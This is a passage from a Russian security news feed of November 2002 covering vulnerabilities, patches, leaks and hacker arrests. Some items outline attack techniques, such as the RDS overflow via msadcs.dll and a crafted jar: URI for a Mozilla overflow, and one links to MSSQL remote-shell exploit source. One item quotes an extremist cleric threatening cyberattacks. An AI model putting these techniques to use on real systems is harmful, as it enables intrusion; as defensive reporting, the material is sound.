Корпорация Microsoft вынуждена была отключить от интернета один из своих ftp-серверов, после того как обнаружилось, что на нем в свободном доступе находятся ряд конфиденциальных документов корпорации. По сообщению Wired News, среди "секретных материалов" имелась база данных о нескольких миллионах пользователях программного обеспечения Microsoft. Общий объем базы данных составляет около 1 Гб. В ней содержалось большое количество личных данных, включая почтовые и электронные адреса клиентов, их номера телефонов и т.д. База данных находилась в одном файле, заархивированном в формате zip. Архив был защищен паролем, однако его длина составляла всего четыре символа. Кроме того, взломать пароль к архиву zip достаточно просто. Для этого существует множество утилит, в числе которых есть и продукт российской компании "Элкомсофт". Сервер, находящийся по адресу ftp://ftppss.microsoft.com/, предназначен для загрузки обновлений и заплаток к продуктам Microsoft. На него же пользователи могут направлять файлы, предназначенные службе технической поддержки Microsoft. Причина того, что на доступный всем желающим сервер попали внутренние документы Microsoft, может заключаться в неправильной конфигурации сервера или, как полагают многие эксперты, в недостатках правил безопасности, действующих внутри Microsoft. Например Расс Купер, эксперт компании TruSecure полагает, что некоторые работники Microsoft попросту не знали, что сервер является публичным, и загружали на него файлы, наивно полагая, что они будут доступны исключительно сотрудникам софтверного гиганта. Подробности - http://www.wired.com/news...
21/11/2002 15:15 Альфа-версия Windows Longhorn попала в интернет.
Вчера в интернете появился внутренний альфа-билд следующей версии Windows, носящей кодовое имя Longhorn. Порядковый номер билда v 3683. Датированный концом сентября, он включает в себя некоторые новые функции. Интерфейс системы немного отличается от интерфейса Windows XP и носит название "Plex". Кардинальное нововведение v замена панели задач на боковую панель (Longhorn Sidebar). Sidebar использует XML для отображения некоторых функций, например, виртуального рабочего стола, поиска в интернет и системных часов. Меню "Пуск" также может быть вызвано из Боковой панели, так что необходимость использования панели задач отпадает в принципе. Вместо диалогового окна "Свойства экрана" имеется недоработанная конфигурационная панель на основе XML, использующая новый API под кодовым названием Avalon. Об Avalon следует рассказать отдельно. Этот программный интерфейс (API) будет сердцем новой архитектуры доступа к информации ОС Longhorn. Новый пользовательский предлагает пользователям более интуитивный подход к организации и обмену информацией, напоминающий нечто вроде "склада". В общих чертах, это концепция информационного окружения пользователя. Согласно ее основной идее, файлы больше не будут распределяться по своему физическому местоположению, вместо этого они будут организованы контекстным образом или же каким-либо другим способом, определенным пользователем или администратором. Как сказал один из разработчиков API, "новый подход коренным образом изменит способ взаимодействия пользователя с компьютером". В альфа-билд включена и новая файловая система Longhorn - WinFS, однако она также не завершена и существенно снижает производительность системы. В "Сведениях о системе" новая ОС идентифицирует себя как Windows 6.0. Источник - http://www.compulenta.ru
21/11/2002 14:40 Новые статьи на bugtraq.ru.
Дмитрий Леонов на своём сайте www.bugtraq.ru выложил статьи, в разное время публиковавшиеся в различных Интернет изданиях. "С миру по нитке" - посвящена описанию распределённых вычислений. "Анонимности.NET" (опубликована в 30-м номере журнала InterNet) - посвящена проблеме анонимности в Интернет, описана настройка броузеров для обеспечения анонимности, а также различных утилиток, помогающие её (анонимности) достичь. "Секретный ключ Большого Брата" - посвящена взгляду на проблему существования в недрах Windows некоего секретного ключа в составе CryptoAPI от MS с подозрительным именем _NSAKEY (NSA - National Security Agency, Агентство Национальной Безопасности США). "ГАС "Выборы": проблемы безопасности" - посвящена рассмотрению возможных уязвимости автоматизированной системы контроля проведения выборной компании. Ссылка на статьи - http://www.bugtraq.ru/library/misc/
21/11/2002 14:16 "КриптоПро CSP 2.0" сертифицирован ФАПСИ.
Компания "Крипто-Про" получила сертификаты ФАПСИ на средство криптографической защиты "КриптоПро CSP 2.0", реализованное в соответствии с интерфейсом Microsoft Cryptographic Service Provider. Работать с новым продуктом стало намного удобнее: прямо из панели управления "КриптоПро CSP" теперь можно устанавливать сертификат в справочник сертификатов Windows и формировать ссылки с личным закрытым ключом пользователя, а также менять и удалять пароль ключевого носителя. Обеспечена поддержка современной операционной системы Windows XP, реализован алгоритм ЭЦП в соответствии с ГОСТ Р 34.10-2001, который пришел на смену старому ГОСТ Р 34.10-94. Более того, теперь в поставку включена реализация протокола TLS ("КриптоПро TLS"). Добавлена поддержка USB-ключей eToken, реализован интерфейс PC/SC для работы со считывателями смарт-карт, а также многое другое. Сертификаты ФАПСИ выданы на версию "КриптоПро CSP" для ОС Windows и версию для Solaris. Подробности - http://www.cryptopro.ru/CryptoPro/index.html
21/11/2002 13:44 Выход Samba 2.2.7.
Объявлено о выходе новой версии пакета Samba, предназначенного для работы в NetBIOS-сетях (Windows). Релиз содержит исправления безопасности и не включает в себя ничего нового за исключением некоторых улучшений кода. По заявлению Samba Team им неизвестны случаи использования обнаруженных "дыр" (версии от 2.2.2 до 2.2.6). Тем не менее всем рекомендуется обновиться. Подробности - http://us1.samba.org/samba/whatsnew/samba-2.2.7.html
21/11/2002 13:16 Cтатья "chroot login HOWTO".
Вашему вниманию представляется статья "chroot login HOWTO", написанная Тони Уайтом (Tony J. White) и Брайаном Родесом (Brian Rhodes). Этот документ из серии HOWTO описывает технологию создания учётных записей пользователей, которые будут ограничены на верхнем уровне только своей домашней директорией (chroot) и не будут иметь возможности перехода в системные директории (например, /usr, /var etc.). Кроме того chroot пользователя, по-видимому, может помочь в обеспечении безопасности системы от локальных атак пользователей. Авторы подчёркивают, что описанная ими методика является Linux-специфической и им пока не известно - будет ли она работать в других UNIX-ОС. Ссылка - http://www.tjw.org/chroot-login-HOWTO/
21/11/2002 12:14 Переполнение буфера в IE и IIS.
Один из MDAC (Microsoft Data Access Components) компонентов, известный как Remote Data Services(RDS) содержит уязвимость, которая позволяет перезапустить буфер (buffer overrun) в функции RDS Data Stub, анализирующей входящие HTTP запросы и генерирующей RDS команды. Атакующий в результате проведения атаки может переполнить динамическую память. Хотя переполнение динамической памяти более трудно в эксплуатации, чем переполнение стека, Microsoft подтвердил, что уязвимость может использоваться для выполнения произвольного кода на системе клиента. MDAC - набор компонентов, используемых для обеспечения связи между базами данных на Windows системах. Технология MDAC присутствует на большинстве Windows систем (XP/2K/ME). Уязвимости подвержены как Web-серверы (IIS), так и Web-клиенты (IE). Web-серверы уязвимы, если на них установлен MDAC и запущен на сервере. Для успешной эксплуатации уязвимости против Web сервера, атакующий должен установить подключение с сервером и послать специально сформированный HTTP запрос, который переполнит буфер данными атакующего. Любой код, будет выполнен с привилегиями IIS службы (по умолчанию, LocalSystem). Web клиенты уязвимы почти всегда, так как RDS Data Stub включен во все последние версии Internet Explorer и нет опции, в которой он может быть отключен. Уязвимость может эксплуатироваться через cпециально оформленную web страницу или HTML почтовое сообщение. Выпущен соответствующий бюллетень MS02-65. Имеет код - "критическая". Уязвимость была обнаружена Foundstone Research Labs. Технология атаки, описанная Foundstone, может выглядеть следующим образом. RDS интерфейс обеспечивается через файл msadcs.dll. Для эксплуатации уязвимости пользователь должен послать IIS серверу POST запрос к msadcs.dll и представить чрезмерно длинную строку для параметра Content-Type; этот запрос приведет к перезаписи части динамической памяти. Записывая поверх некоторых указателей функции в пределах памяти (напимер: unhandledexceptionfilter), можно уничтожить текущий поток IIS или даже выполнить произвольный код в пределах удаленного процесса перед завершением потока. В новости был использован материал с сервера www.securitylab.ru. Бюллетень Microsoft - http://www.microsoft.com/technet/security/bulletin/ms02-065.asp Подробнейшее описание уязвимости - http://www.SecurityLab.ru/?ID=34456
21/11/2002 11:31 Выпущен кумулятивный патч для Internet Explorer.
20 ноября Microsoft выпущен кумулятивный патч для Internet Explorer (Q328970), о чём фирма оповещает в бюллетене по безопасности MS02-066. В патч включены все ранее выпущенные заплатки для MSIE версий 5.01, 5.5 и 6.0, а также 6 вновь обнаруженных уязвимостей: возможность перезапуска буфера (buffer overrun) в результате некорректной проверки параметров загружаемого PNG-файла, возможность раскрытия критической информации при обработке закодированных символов в URL, некорректная проверка компоненты, при помощи которой вызывается тег OBJECT может позволить получить имя папки Temporary Internet Files (возможность получить имя зарегистрированного пользователя в системе и доступа к cookies), три уязвимости, имеющую различную природу, но в итоге позволяющие одному Вэб-сайту получить информацию о другом посещённом Вэб-сайте, а также информацию о локальной системе пользователя (зона "My Computer"). Патч также устанваливает Kill Bit на семейство DirectX управления ActiveX, которое в настоящий момент не используется, однако также содержит уязвимость. Кроме того, усовершенствован механизм кросс-доменной проверки, впервые представленный в сервис-паке 1 для IE. Бюллетень имеет код "Важный" (Important) в системе безопасности M$. Подробности - http://www.microsoft.com/security/security_bulletins/ms02-066.asp
21/11/2002 10:31 В Москве поймали хакера-вымогателя.
В Москве задержан 18-летний житель района "Митино" Эдуард Голицын, который вымогал четыре тысячи долларов у американской фирмы, угрожая в случае отказа взломать ее сервер. Как сообщили РИА "Новости" в ГУВД столицы, Голицын был задержан во вторник в своей квартире на Пятницком шоссе сотрудниками Управления по борьбе с преступлениями в сфере высоких технологий и Управления оперативно-технических мероприятий ГУВД. По оперативным данным, в сентябре Голицын незаконно проник в личный "почтовый ящик" представителя американской фирмы, поставил на него новый пароль и начал копировать поступающую информацию. Хакер получил доступ к документам, представляющим коммерческую тайну, и угрожал заблокировать их, если компания не выплатит деньги. Указанная вымогателем сумма была перечислена на его счет. После задержания Голицына отпустили под подписку о невыезде, по факту взлома "почтового ящика", воровства информации и вымогательства проводится расследование. Источник - http://www.rian.ru/
20/11/2002 16:15 UnitedLinux 1.0: подробности.
Во вторник прошла презентация финального релиза UnitedLinux SuSE, SCO Group, Turbolinux и Conectiva, компании-разработчики UnitedLinux сдержали свое слово. Презентация финальной версии продукта прошла 19 ноября в рамках выставки Comdex'2002. Там же были объявлены подробности, касающиеся его распространения. В коробке UnitedLinux 1.0 будут лежать четыре диска. Первые три из них будут одинаковыми для всех поставщиков ("база" UnitedLinux), а на последний каждый поместит то, что сочтет нужным. SCO уже объявила о выходе SCO Linux 4.0 Server ("powered by UnitedLinux"), ее примеру последовала SuSE (SuSE Enterprise Server 8). Информации от остальных участников проекта, Turbolinux и Conectiva, пока не поступало. Источник - http://www.linuxcenter.ru
20/11/2002 15:24 Эксплоит уязвимости в UDP-сервисе MSSQL.
Опубликован исходный код эксплоита, при помощи которого можно получить удалённый шелл на сервере, в котором присутствует уязвимость в UDP-сервисе MSSQL версий SP0, SP1, SP2. Предназначен для компиляции в среде win32, представляет собой модернизированный исходный код, опубликованный ранее Дэвидом Литчфилдом. Скачать - http://packetstorm.linuxsecurity.com/0211-exploits/sql2.cpp
20/11/2002 14:58 Microsoft выпускает бюллетени по безопасности для "чайников".
Рассчитывая сделать свои бюллетени по безопасности более удобочитаемыми, корпорация Microsoft сообщила вчера о пересмотре основных принципов, которые использовались для оценки серьезности проблем защиты в продуктах компании. Кроме того, будет выпущена специальная рассылка для конечных пользователей, которые не нуждаются во всех технических деталях, сообщаемых системным администраторам и специалистам по безопасности. Все эти изменения произошли как реакция на мнение пользователей о слишком сильной детализации бюллетеней, сбивающей с толку. Microsoft Security Response Center, исследующий любые обнаруженные уязвимости в продуктах компании, отправляет почтовую рассылку с рекомендациями каждый раз, когда подтверждается опасность найденной "дыры" для широкого пользователя. Хотя эта рассылка отправляется всем, основной упор делается на технически подготовленных пользователей, поэтому бюллетени перегружены множеством деталей, ненужных обычному пользователю домашнего компьютера. В новой рассылке для конечных пользователей проблемы и способы их решения будут объясняться на уровне обывателя. В обновленном подходе появилась дополнительная оценка серьезности проблемы - "Важная", занявшая место между "Критической" и "Умеренной". Важные уязвимости определяются как такие, эксплуатация которых "может подвергнуть опасности конфиденциальность, целостность и работоспособность" пользовательских данных или ресурсов процессов. Источник - http://www.cnews.ru
20/11/2002 14:25 Выход новой версии XSpider.
Вчера вышла новая версия сканера XSpider, не уступающая по своим возможностям, согласно заявлению авторов, таким известным сканерам, как SS Internet Scanner, Nessus, Retina. База данных новой версии (выпуск 6.4.0.22 версии 6.40) включает более 40 новых уязвимостей. Для загрузки необходимо сначала зарегистрироваться. Страница регистрации - http://www.ptsecurity.ru/download.asp
20/11/2002 14:06 Уязвимости в QNX.
В версии операционной системы QNX 6.2.0 Non-commercial edition для x86-архитектуры были обнаружены уязвимости. Первая из них связана с некорретными разрешениями (rwxrwxrwx), выставляемыми на многие файлы, после выполнения патчей: OS Update for 6.2.0 (Patch A), PhShutdown security patch, Package file system patch, phrelaycfg. Вторая уязыимость связана с некорректными полномочиями на буфер обмена (clipboard), что позволяет другому локальному пользователю получить доступ к содержимому буфера. Подробности - http://www.4os.org/advisories.htm
20/11/2002 13:38 Уязвимость в ypserv.
Обнаружена уязвимость в ypserv (сервер Yellow Pages), при помощи которого осуществляется централизованное хранение базы данных паролей пользователей, а также их авторизация при помощи формирования запросов к центральному авторизующему серверу. Уязвимости подвержены версии 2.5 и более ранние. Удалённый атакующий может вызвать исчерпание памяти на сервере, вызвав запрос на несуществующую карту базы данных. После исчерпания всей доступной памяти ypserv тихо умирает (DoS). MandrakeSoft выпущены обновлённые версии для дистрибутивов 7.2, 8.0, 8.1, 8.2, 9.0 и соответствующий бюллетень (MDKSA-2002:078). Подробности - http://www.padl.com/Articles/PotentialBufferOverflowin.html
20/11/2002 12:31 Очередная уязвимость в Internet Explorer.
В MSIE Лю Ди Ю (Liu Die Yu) обнаружена очередная уязвимость. Уявзимость один в один воспроизводит старую уязвимость IFRAME, которая устранена ранее Microsoft. Автором было обнаружено, что тег IFRAME, открытый при помощи "openModalDialog" имеет "dialogArguments" родительского приложения. Используя обнаруженную уязвимость атакующий может открыть (через "openModalDialog") свою страницу, содержащую IFRAME с содержимым (скриптом, например), которое может быть выполнено в локальной зоне "My Computer". При этом скрипт может использовать "dialogArguments" напрямую без филтрации содержимого. Как указал вписьме BUGTRAQ Дейв Ахмад (модератор BUGTRAQ и одновременно сотрудник Symantec), уязвимости в MSIE, которые позволяют выполнять произвольный код в локальной зоне "My Computer", появляются практически каждую неделю (последняя из них, опубликованная Andreas Sandblad позволяла в том числе и форматировать диск). При этом Microsoft борется с фактическим проявлением уязвимости в конкретном продукте, а не с идеологией построения системы безопасности в целом. Рекомендации отключить возможность выполнения скриптов неприемлемы большинством пользователей Интернет. Уязвимость была обнаружена в версии IE 6 (версия IEXPLORE.EXE: 6.0.2600.0000, версия библиотеки MSHTML.DLL: 6.00.2600.0000). О наличии уязвимости в IE6.1 SP1 пока неизвестно. Подробности и демонстрация - http://www16.brinkster.com/liudieyu/BadParent/BadParent-CONTENT.txt
20/11/2002 11:96 Обновление пакетов NetBSD.
Выпущены 3 бюллетеня по безопасности ОС NetBSD (что, надо признать, бывает нечасто для этой ОС) с номерами: SA2002-027, -028, -029. В бюллетенях описаны уязвимости в пакетах, входящих в состав веток NetBSD 1.5.x, 1.6, current. В бюллетенях также даются ссылки на обновлённые версии пакетов и рекомендации по их обновлению. Были затронуты: ftpd (возможность обхода файрволла при некорректном ответе на cспециально сформированный запрос STAT), libc (неправильная обработка границ функциями getnetbyname(3) и getnetbyaddr(3)), named (подвержен уязвимости в реализации BIND - мы описывали её ранее). Подробности - ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/
19/11/2002 17:05 Крэкеры похитили 52К университетских пароля.
Как сообщает норвежская газета Aftenposten, университет в столичном Осло был вынужден изменить пароли 52К пользователей университетской сети и переинсталлировать ПО на многих компьютерах после того, как стало известно, что крэкеры получили полный контроль над сетью университета. Была получена центральная база университета со всеми логинами и паролями. Кроме этого сервера университета использовались для хранения огромного количества нелегального ПО и фильмов. Судя по словам IT-директора университета, сначала был взломан сервер с СУБД SQL, на который был установлен парольный сниффер, при помощи которого в свою очередь был получен доступ к основному компьютеру с центральной базой данных паролей. SQL была установлена на сервере под управлением Win2K. Подробности - http://www.aftenposten.no/english/local/article.jhtml?articleID=437439
19/11/2002 16:34 Сторонники Бен Ладена готовятся к кибератакам.
В эксклюзивном понедельничном интервью журналу "Computerworld" исламский священник-фундаменталист, постоянно проживающий в Лондоне, сообщил, что Аль-Каеда и другие мусульманские экстремистские группы во всем мире планируют активно использовать интернет в качестве орудия джихада против Запада. Шейх Омар Бахри Мухаммад, глава базирующейся в Лондоне группировки Джамаат Аль-Мухаджирун и представитель Международного исламского фронта джихада против евреев и христиан Усамы Бен Ладена, рассказал, что все виды высоких технологий, включая интернет, активно изучаются правоверными, для того чтобы воспользоваться самыми современными достижениями в целях всемирного джихада. "Уже скоро вы станете свидетелями атак на фондовые биржи Нью-Йорка, Лондона и Токио", - сказал Бахри. Группы джихада разбросаны по всему миру, и они очень активно используют интернет, говорит Бахри. "Миллионы мусульман во всем мире готовы начать хакерские атаки на правительственные сайты США и Израиля. Аль-Кайеда имеет высококвалифицированных специалистов по компьютерным технологиям, и я не удивлюсь, если завтра вы услышите о мировом экономическом кризисе вследствие атак на основные компьютерные системы крупнейших компаний. Я уверен, что Усама Бен Ладен достоин уважения, и большинство [мусульманских] студентов, изучающих IT-технологии и программирование, поддерживают его идеи", - сказал Бахри. Источник - http:///www.pcworld.com/
19/11/2002 16:20 Выход Lindows 3.0.
Вчера было официально объявлено о выходе релиза 3.0 ОС Lindows. Цена продукта -129$. Компания обеспечивает пользователям доступ к сервису Click-N-Run Warehouse - онлайновой библиотеке ПО, включающей сотни программ, в том числе Sun's StarOffice, Tux Racer Deluxe, Photogenics, Hancom Sheet. Для пользователей сервиса Wal-Mart продают компьютеры с предустановленной ОС Linodows по цене 199$. Источник - http://linuxtoday.com
19/11/2002 15:13 Возможность переполнения буфера в AIM.
Husun Arner в BUGTRAQ сообщает о возможности переполнения буфера в AOL Instant Messenger версии 5.1.3036 (крайняя на 16 ноября). Вызвать переполнение можно при попытке получения информации от экрана с именем (screenname) более 88 символов. Источник - http://www.securityfocus.com
19/11/2002 14:44 Paketto Keiretsu v.1.0.
Дан Каминский из DoxPara Research анонсировал выход первой версии разработанного им инструмента Paketto Keiretsu. Сам пакет представляет собой набор утилит для сканирования/изучения сети. Включает: scanrand - сканер, который состоит из двух независимых процессов (один процесс посылает запрос, второй ловит ответ на этот запрос), содержит в себе криптографическую подпись, генерируемую на основе технологии "Inverse SYN Cookie". Вторай утилита - minewt, выполняет функции сетевой трасляции адресов (NAT), но работает на 2-м уровне сетевой модели, применяя т.н. технологию MAT (MAC Address Translation. Третья утилита - lc или Linkcat, является аналогом netcat (работает на 4-7 уровнях сетевой модели - TCP/UDP), но работает на 2-м уровне (Ethernet). Четвёртая утилита - phentropy, строит графики трёхмерных матриц больших объёмов данных. Пятая утилита - paratrace, подобна traceroute (показывает путь от клиента к серверу), однако её работа построена не на принципе анализа TTL пакетов UDP, ICMP или SYN TCP, а на как бы вклинивании в существующее соединение. Сайт проекта - http://www.doxpara.com
19/11/2002 13:43 Выход FreeBSD-5.0-DP2.
Появилась вторая версия для разработчиков (developers preview): FreeBSD-5.0-DP2. По сравнению с 5.0-DP1 произошли следующие изменения: включен модуль дисковой геометрии GEOM и система шифрования GBDE; GCC обновлен до версии 3.2; добавлены TrustedBSD MAC Framework, файловая система UFS2, поддержка FireWire-устройств и RAIDframe (экспериментальная). По неофициальным данным, выпуск FreeBSD-5.0-RELEASE будет задержан как минимум на один месяц и, возможно, выйдет в середине декабря. Release Notes - http://www.FreeBSD.org/releases/5.0R/DP2/relnotes.html
19/11/2002 13:17 Возможность DoS в AIX.
В операционной системме AIX, выпускаемой и поддерживаемой IBM для рабочих станций RS/6000 Обнаружена возможность выполнения DoS. Возникает при обработке сетевых пакетов с утановленным флагом Selective Acknolwedgements. Если число ретрансляционных TCP пакетов посланных к системе превышает уровень, определенный системой, работа системы аварийно завершится. Уязвимость обнаружена в версиях AIX 4.3.3 и 5.1. Источник - http://www.securitylab.ru
19/11/2002 12:20 Computer Economics подсчитал потери от самых вредоносных вирусов.
По данным Computer Economics, в 2000 году вирусные атаки привели к совокупным потерям в размере $17,1 млрд. Этот показатель сократился до $13,2 млрд. в 2001 году, при этом ущерб от одного только вредоносного "червя" SirCam оценивался в $1,15 млрд., Code Red - $2,62 млрд., Nimda - $635 млн. С вирусами, троянцами и червями в 2001 году столкнулось 94% опрошенных компаний (данные аналитического обзора 2002 Computer Crime and Security Survey), 48% компаний зафиксировали атаки на свои веб-серверы. В 2002 году об ущербе, понесенном в результате атак, заявило 85% компаний, из которых 44% особо отметили разрушительное воздействие "червей". Источником угрозы можно считать, в частности, посещение инфицированного веб-сервера (посредством которого распространяется вредоносный код на Java, JavaScript, VBScript и т.д.), наличие своего собственного веб-сервера (распространение Red Code, Slapper и т.д.), получение электронной почты (Klez, Tanatos, спам и т.д.), получение дистрибутивов ПО (Microsoft и т.д.). Серьезную опасность представляют также целенаправленные атаки, как внешние - со стороны конкурентов, так и внутрикорпоративные - со стороны сотрудников. Источник - http://www.cnews.ru
18/11/2002 17:32 И на старуху бывает проруха (старая народная мудрость).
Стали известны подробности "вычисления" "хакера всех времён и народов" Гарри МакКиннона (Gary McKinnon), британского подданого, взломавшего множество сайтов Министерства Обороны США. Для вычисления были использованы лог-файлы одной софтверной фирмы в Висконсине - при этом сразу было определено географическое местоположение взломщика. Для скрытия своего присутствия Гарри установил на взломанные компьютеры утилиту RemotelyAnywhere, предназначенную для удалённого управления PC через Интернет. Эта утилита не определяется (также, как и NetBus или Back Orifice) большинством антивирусного ПО. Используя компьютер, подключённый через ISP в Англии, МакКиннон загрузил "триальную" копию RemotelyAnywhere с сервера фирмы Binary Research, расположенного в штате Милуоки дистрибутора утилиты, в марте 2001 г. Для получения кода, который разблокировал демо-версию, использовался почтовый адрес подруги Гарри. При этом IP-адрес Гарри и почтовый адрес его подруги остались в логах Binary Research и стали в дальнейшем отправными точками для начала раскрутки. До этого было определено, что установленная версия утилиты на одном из военных сайтов была скачана именно МакКинноном. Сейчас МаКиннону грозит до 10 лет тюрьмы и штраф в $250,000. Подробнее - http://www.wired.com/news/technology/0,1282,56392,00.html
18/11/2002 16:49 Статья "Как правильно задавать вопросы".
Думается, эта статья будет очень полезна многим посетителям форума нашего сайта. представляет собой перевод документа, написанного Эриком Стивеном Реймондом "How To Ask Questions The Smart Way". Версия 2.4 этого документа вышла 17 октября 2002 г. Перевод выполнен Валерием Кравчуком и выложен 12 ноября на сайте linuxshop.ru. Подробности - http://linuxshop.ru/lib/?cid=9&id=17
18/11/2002 16:17 Статья "Сборка монолитного ядра FreeBSD".
В статье "Building Monolithic Kernels and Root Filesystems for FreeBSD" рассказано о том, как собрать ядро FreeBSD с вкомпилированной в него root FS (через mfsroot). Такое может понадобиться для загрузки по сети, без подгрузки root FS по NFS или когда использование /boot/loader или /boot/pxeboot недопустимо, для загрузки PicoBSD с TFTP, для встраиваемых систем и т.д. Информация взята с www.opennet.ru. Подробности - http://ezine.daemonnews.org/200211/monolithic-kernel.html
18/11/2002 15:44 Глоссарий сетевых терминов.
По приведённой ссылке содержится база данных по русской и английской терминологии в сфере компьютерных сетей и телекоммуникаций. База собрана Николаем Малых. Предоставляет возможность поиска как по русским терминам/сокращениям, так и по английским. Также на приведённой странице содержится энциклопедия сетевых протоколов, содержащая большое количество переводов, связанных с сетевыми технологиями и протоколами. Ссылка энциклопедии ведёт на www.protocols.ru. Ccылка - http://www.nmalykh.org/work/index.html
18/11/2002 13:02 Возможность переполнения буфера в Netscape/Mozilla.
Известный исследователь в области безопасности zen-parse обнаружил возможность переполнения буфера в популярных броузерах Netscape и Moziila. Причём нашёл он уязвимость ещё 15 июля сего года, о чём засвидетельствовано в базе данных уязвимостей сервера bugzilla.mozilla.org (BUG ID -157646). Уязвимость связана с форматом упакованного файла jar. Технология связана с созданием специально подготовленного GIF-файла (автор предлагает сфо вариант из шести целых 16-ричных цифр) и последующей его упаковкой программой zip в архив .jar. Если в дальнейшем указать полный путь (URI) к файлу на Вэб-странице - jar:http://host/~username/new.jar!/test.gif получится переполнение буфера, что даёт возможность (при предварительном формировании шелл-кода внутри GIF-файла) выполнения произвольного кода на машине жертвы (под её логином, разумеется). Подробности - http://online.securityfocus.com/archive/1/299837/2002-11-14/2002-11-20/0
18/11/2002 12:22 Статья "Apache Virtual Hosting With One IP and Many Domains"
В статье описано, как настраивать Вэб-сервер Apache, если имеется один IP-адрес, выделенный провайдером и необходимо обеспечить для сервера более одного доменного имени (виртуальный хостинг). Помимо всего прочего, неплохо описан процесс конфигурирования сервера через файлы httpd.conf и apacheconf. Подробности - http://www.linuxorbit.com/modules.php?...
18/11/2002 12:10 Обновление ПО конфигурирования Apache для Mac OS.
Tenon Intersystems объявила об обновлении ПО конфигурирования Вэб-сервера Apache для Mac OS X 10.2.2. Пакет называется iTools, новая версия - 6.5.7. Обеспечивает GUI вэб-ориентированный интерфейс для конфигурирования и управлениями сервисами Apache, DNS и FTP. Новый релиз помимо всего прочего обновляет Apache до версии 1.3.27, mod_ssl до 2.8.12 и OpenSSL до 0.9.6g. В дополнение к обновлению версии iTools объявлено также об обновлении пакета PHP до 4.2.3-2. Объявлено о планируемом в следующем году выпуске iTools 7-й версии. В новой версии обещается поддержка Apache 2.x, улучшение масштабируемости сервера, а также новые возможности - включая доменно-специфическое администрирование и встроенное средство протоколирования проходящего Вэб-траффика. Помимо выпуска iTools, Tenon также выпускает продукт Post.Office - почтовый сервер и сервер почтовых рассылок для Mac OS X. Источник - http://www.tenon.com
17/11/2002 23:05 Red Hat обновляет ядро.
После появившихся сообщениях о возможности выполнить локальный DoS к ядру Linux, который может привести к "замораживанию" системы, Red Hat анонсировал выход новой версии ядра в RPM (RedHat Packet Manager)-файлах. Выпущены обновлённые версии ядра для RH 7.1, 7.1K, 7.2, 7.3, и 8.0. Помимо устранения описанного бага новая версия ядра также устранены баги в драйверах звуковой карты maestro3, сетевой карты PCMCIA Xircom и чипов Broadcom gigabit ethernet. Новая версия ядра в RPM 2.4.18-18.7. Источник - http://www.redhat.com
17/11/2002 21:28 Ошибка в GCC.
Как пишет Жозеф Вагнер (Joseph D. Wagner) компилятор GNU GCC при компиляции исходного кода программы и задании оптимизации не удаляет критичные данные из памяти. Обычно, при написании программы является хорошей практикой с точки зрения безопасности очищать область памяти, в которой могут храниться критичные с точки зрения безопасности данные (например, хэшированные зашифрованные пароли), поскольку в дальнейшим подобные данные могут оказаться в своп-разделе/файле, временных файлах, дампе памяти и могут быть считаны злоумышленником. Подобная очистка памяти может выполняться функцией, подобной memset(Password, 0, sizeof(Password));. Однако, как оказалось, при оптимизации компилятор считает подобные данные избыточными и не несущими информации ("dead store removal"), и удаляет подобную строку из получаемого в итоге выполнимого файла, оставляя программиста в блаженном неведении о выполненной работе. В итоге критичные данные остаются в памяти и могут быть считаны. Одной из мер противодействия этой "услуге" компилятора является использование типа данных volatile (например, вставка после функции memset() cтроки *(volatile char *)Password = *(volatile char *)Password;). Вторым способом решения является отключение оптимизации для части кода - вставка строки #pragma optimize("-no-dead-code-removal") до функции memset() с последующим отключением - #pragma optimize("-dead-code-removal"). "Ошибка" была обнаружена в версии 3.2 GCC для платформы i386. Подробности - http://gcc.gnu.org/cgi-bin/gnatsweb.pl...
17/11/2002 20:40 IP Sentinel - инструмент для защиты от ARP-спуффинга.
Вашему вниманию предлагается проект IP Sentinel - инструмент, который предотвращает ARP-спуффинг в локальной сети. Работа пакета основана на посылке периодических ARP-запросов и построении на их основе ARP-таблицы. После приёма ответа с подменённого IP-адреса ему в дальнейшем посылается ICMP-пакет IP unreachable. Пакет предназначен для UNIX-подобных ОС. Раньше мы публиковали ссылку на патч Ильи Тетерина для ядра Linux. IP Sentinel может применяться также, как и патч в качестве одной из меры противодействия ARP-Spoofing, хотя и обладает меньшей функциональностью и гибкостью настройки. Сайт проекта - http://www-user.tu-chemnitz.de/~ensc/ip-sentinel
17/11/2002 20:11 Статья "Почему Linux не приживается на десктопе".
Дон Сегаард (Don Soegaard) на ZDNeT опубликовал статью, в которой, по его мнению, изложены основные причины, по которым не происходит резкого перехода пользователей рабочих станций на Linux. Вот основные из причин. Как только вы выходите за пределы стандартного рабочего стола, сложность обучения, необходимого для настройки системы, становится непомерной. К тому же GNU/Linux следует по той же колее, что и остальная индустрия; она не удовлетворяет потребности продвинутых пользователей в более совершенных офисных инструментах. # Хакеры могут нахваливать простоту и стабильность Linux — и будут правы: если Linux настроена под конкретную систему, работать с ней легко и безопасно. Однако совсем другое дело, когда настроить Linux пытается новичок. Для тех, у кого нет опыта работы с этой ОС, такие задачи, как изменение разрешения экрана, настройка домашней сети или добавление новой программы, часто становятся чрезмерно серьезными проектами. # Офисное ПО топчется все на том же месте, с которого оно начиналось. Разработки дважды (в середине 80-х и в середине 90-х) совершили полный оборот между курсом на самостоятельные приложения и интегрированными комплексами. Ни то, ни другое не стало оптимальным, и оба направления наследуют подход самых ранних программ с их искусственным распределением инструментов по отдельным функциональным областям. Более подробно - http://zdnet.ru/?ID=291596
17/11/2002 19:20 Новая версия рейтинга пятисот мощнейших суперкомпьютеров мира
16 ноября на сайте TOP500.org появилась обновленная версия списка пятисот самых мощных суперкомпьютеров в мире. Место суперкомпьютера в списке зависит от его производительности в тесте Linpack, измеренной в гигафлопсах (миллиардах операций с плавающей запятой в секунду). Рейтинг подготовили специалисты Манненхаймского университета (Германия), Университета штата Теннеси и Национального научно-вычислительного центра энергетических исследований США (NERSC) в Беркли, штат Калифорния. Новый, двадцатый по счету, хит-парад суперкомпьютеров возглавляет суперкомпьютер Earth Simulator, который был построен японской компанией NEC для моделирования процессов, происходящих в литосфере, атмосфере и гидросфере нашей планеты. Ту же картину можно было видеть и в предыдущем рейтинге TOP500. Максимальная производительность суперкомпьютера в тесте Linpack, достигнутая на практике (этот показатель обозначается Rmax), составила 35860 гигафлопс, а теоретическая пиковая производительность Earth Simulator (Rpeak) - 40960 гигафлопс. Этот результат более чем вчетверо превосходит достижение ближайших конкурентов - двух идентичных компьютеров Hewlett-Packard ASCI Q, лелящих второе и третье места в рейтинге с результатом Rmax = 7727 гигафлопс и Rpeak = 10240 гигафлопс. Оба суперкомпьютера впервые представлены в рейтинге TOP 500. Они установлены в Лос-Аламосской национальной лаборатории и базируются на серверах AlphaServer SC ES45. В каждом суперкомпьютере 